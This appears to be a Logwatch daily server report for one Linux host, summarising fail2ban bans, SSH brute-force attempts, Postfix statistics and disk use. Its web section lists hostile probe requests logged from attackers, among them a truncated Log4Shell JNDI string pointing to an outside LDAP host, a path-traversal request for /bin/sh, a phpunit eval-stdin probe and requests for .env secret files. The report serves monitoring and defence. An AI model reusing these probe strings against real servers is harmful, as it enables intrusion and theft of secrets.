[TOPF] Logwatch for h2361197.stratoserver.net (Linux)

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sat Dec 25 04:42:04 2021 Date Range Processed: yesterday ( 2021-Dec-24 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [ 27:27 ] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 6 sites probed the server 103.156.91.51 159.223.103.30 185.196.220.54 205.185.124.100 212.192.216.31 61.219.11.151 Requests with error response codes 400 Bad Request null: 9 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 3 Time(s) /: 2 Time(s) /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s) mstshash=Administr: 2 Time(s) mstshash=Domain: 2 Time(s) /.env: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /c/version.js: 1 Time(s) /flu/403.html: 1 Time(s) /stalker_portal/c/version.js: 1 Time(s) /stream/live.php: 1 Time(s) /streaming/clients_live.php: 1 Time(s) /system_api.php: 1 Time(s) HTTP/1.0: 1 Time(s) 500 Internal Server Error /: 25 Time(s) /robots.txt: 4 Time(s) /.env: 3 Time(s) /ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s) //login_sid.lua: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s) /Autodiscover/Autodiscover.xml: 1 Time(s) /actuator/health: 1 Time(s) /bag2: 1 Time(s) /c/version.js: 1 Time(s) /console/: 1 Time(s) /favicon.ico: 1 Time(s) /flu/403.html: 1 Time(s) /mifs/.;/services/LogService: 1 Time(s) /owa/auth.owa: 1 Time(s) /owa/auth/logon.aspx: 1 Time(s) /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s) /owa/auth/x.js: 1 Time(s) /stalker_portal/c/version.js: 1 Time(s) /stream/live.php: 1 Time(s) /streaming/clients_live.php: 1 Time(s) /system_api.php: 1 Time(s) /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s) /~app/.env: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (129.204.143.161): 36 Time(s) root (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 36 Time(s) root (103.163.12.2): 35 Time(s) root (114.113.238.195): 35 Time(s) root (170.116.222.35.bc.googleusercontent.com): 35 Time(s) root (213.6.203.226): 35 Time(s) root (106.12.86.8): 34 Time(s) root (205.214.74.6): 34 Time(s) root (49.233.44.150): 34 Time(s) root (91.183.81.82): 34 Time(s) root (121.4.31.230): 32 Time(s) root (94.200.55.38): 32 Time(s) root (121.5.107.215): 26 Time(s) root (203.160.55.212): 25 Time(s) root (191.209.88.62): 19 Time(s) root (ns3152155.ip-151-106-38.eu): 18 Time(s) unknown (121.4.31.230): 18 Time(s) unknown (94.200.55.38): 18 Time(s) unknown (203.160.55.212): 17 Time(s) root (112.216.157.26): 16 Time(s) unknown (103.163.12.2): 15 Time(s) unknown (114.113.238.195): 15 Time(s) unknown (170.116.222.35.bc.googleusercontent.com): 15 Time(s) unknown (213.6.203.226): 15 Time(s) unknown (129.204.143.161): 14 Time(s) unknown (49.233.44.150): 14 Time(s) unknown (91.183.81.82): 14 Time(s) unknown (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 14 Time(s) unknown (106.12.86.8): 10 Time(s) unknown (205.214.74.6): 10 Time(s) unknown (ns3152155.ip-151-106-38.eu): 9 Time(s) root (122.4.45.131): 7 Time(s) root (36.37.122.43): 7 Time(s) unknown (112.216.157.26): 7 Time(s) root (107.189.5.248): 6 Time(s) root (181.119.30.26): 6 Time(s) root (199.195.248.20): 6 Time(s) root (exitrelay31.medvideos-tor.org): 6 Time(s) root (lux2.tor-exit-node.net): 6 Time(s) root (tor.exit.privatemonero.org): 6 Time(s) unknown (121.5.107.215): 6 Time(s) unknown (191.209.88.62): 6 Time(s) root (122.4.29.154): 5 Time(s) root (113.120.63.219): 4 Time(s) root (116.255.131.3): 4 Time(s) root (221.213.129.46): 4 Time(s) unknown (116.255.131.3): 3 Time(s) unknown (122.4.29.154): 3 Time(s) unknown (122.4.40.112): 3 Time(s) unknown (36.37.122.43): 3 Time(s) unknown (121.182.121.36): 2 Time(s) unknown (220.71.14.244): 2 Time(s) unknown (p54ace603.dip0.t-ipconnect.de): 2 Time(s) mail (106.12.86.8): 1 Time(s) root (109.230.253.146): 1 Time(s) root (122.4.40.112): 1 Time(s) root (211.76.125.186): 1 Time(s) root (36.112.135.187): 1 Time(s) root (38.91.102.46): 1 Time(s) unknown (103.59.150.13): 1 Time(s) unknown (104.244.76.170): 1 Time(s) unknown (113.120.63.219): 1 Time(s) unknown (122.4.45.131): 1 Time(s) unknown (134.236.247.145): 1 Time(s) unknown (141.98.10.202): 1 Time(s) unknown (165.232.94.242): 1 Time(s) unknown (185.90.136.69): 1 Time(s) unknown (209.141.46.251): 1 Time(s) unknown (221.213.129.46): 1 Time(s) unknown (ltlkwlb.cn): 1 Time(s) unknown (phoolandevi.tor-exit.calyxinstitute.org): 1 Time(s) unknown (vmi668762.contaboserver.net): 1 Time(s) Invalid Users: Unknown Account: 248 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 3 Miscellaneous warnings 8.768K Bytes accepted 8,978 8.768K Bytes sent via SMTP 8,978 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 8 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 8 Total 4xx Rejects 100.00% ======== ================================================== 152 Connections 16 Connections lost (inbound) 152 Disconnections 1 Removed from queue 1 Sent via SMTP 1 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 6 Time(s) Failed logins from: 35.222.116.170 (170.116.222.35.bc.googleusercontent.com): 35 times 36.37.122.43: 7 times 36.112.135.187: 1 time 38.91.102.46 (46-102-91-38.clients.gthost.com): 1 time 49.233.44.150: 34 times 91.183.81.82 (82.81-183-91.adsl-static.isp.belgacom.be): 34 times 94.200.55.38: 32 times 103.163.12.2: 35 times 106.12.86.8: 35 times 107.189.5.248 (Luxembourg12Tor.org): 6 times 107.189.8.65 (lux2.tor-exit-node.net): 6 times 109.230.253.146: 1 time 112.216.157.26: 16 times 113.120.63.219: 4 times 114.113.238.195: 35 times 116.255.131.3: 4 times 121.4.31.230: 32 times 121.5.107.215: 26 times 122.4.29.154 (154.29.4.122.broad.jn.sd.dynamic.163data.com.cn): 5 times 122.4.40.112 (112.40.4.122.broad.jn.sd.dynamic.163data.com.cn): 1 time 122.4.45.131 (131.45.4.122.broad.jn.sd.dynamic.163data.com.cn): 7 times 129.204.143.161: 36 times 151.106.38.100 (ns3152155.ip-151-106-38.eu): 18 times 161.189.131.226 (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 36 times 181.119.30.26 (host26.181.119.30.baehost.com.ar): 6 times 191.209.88.62 (191-209-88-62.user.vivozap.com.br): 19 times 199.195.248.20: 6 times 203.160.55.212: 25 times 205.185.115.207 (exitrelay31.medvideos-tor.org): 6 times 205.214.74.6 (205.214.74-6.static.data393.net): 34 times 209.141.45.215 (tor.exit.privatemonero.org): 6 times 211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time 213.6.203.226: 35 times 221.213.129.46: 4 times Illegal users from: 2001:470:1:332::7: 1 time undef: 161 times 35.222.116.170 (170.116.222.35.bc.googleusercontent.com): 15 times 36.37.122.43: 3 times 43.134.92.159: 1 time 49.233.44.150: 14 times 65.49.20.69 (scan-20.shadowserver.org): 1 time 84.172.230.3 (p54ace603.dip0.t-ipconnect.de): 2 times 91.183.81.82 (82.81-183-91.adsl-static.isp.belgacom.be): 14 times 94.200.55.38: 18 times 103.59.150.13: 1 time 103.163.12.2: 15 times 104.244.76.170 (tor2.panhu.xyz): 1 time 106.12.86.8: 10 times 112.216.157.26: 7 times 113.120.63.219: 1 time 114.113.238.195: 15 times 116.255.131.3: 3 times 121.4.31.230: 18 times 121.5.107.215: 6 times 121.182.121.36: 2 times 122.4.29.154 (154.29.4.122.broad.jn.sd.dynamic.163data.com.cn): 3 times 122.4.40.112 (112.40.4.122.broad.jn.sd.dynamic.163data.com.cn): 3 times 122.4.45.131 (131.45.4.122.broad.jn.sd.dynamic.163data.com.cn): 1 time 129.204.143.161: 14 times 134.236.247.145: 1 time 141.98.10.202: 1 time 151.106.38.100 (ns3152155.ip-151-106-38.eu): 9 times 161.97.89.132 (vmi668762.contaboserver.net): 1 time 161.189.131.226 (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 14 times 162.247.74.216 (phoolandevi.tor-exit.calyxinstitute.org): 1 time 165.232.94.242: 1 time 185.90.136.69 (ksort-fi41-sort.betmam.com): 1 time 191.209.88.62 (191-209-88-62.user.vivozap.com.br): 6 times 203.160.55.212: 17 times 205.185.125.184 (ltlkwlb.cn): 1 time 205.214.74.6 (205.214.74-6.static.data393.net): 10 times 209.141.46.251: 1 time 213.6.203.226: 15 times 220.71.14.244: 2 times 221.213.129.46: 1 time **Unmatched Entries** error: Received disconnect from 109.230.253.146: 3: com.jcraft.jsch.JSchException: Auth fail [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop33257p1 394G 242G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################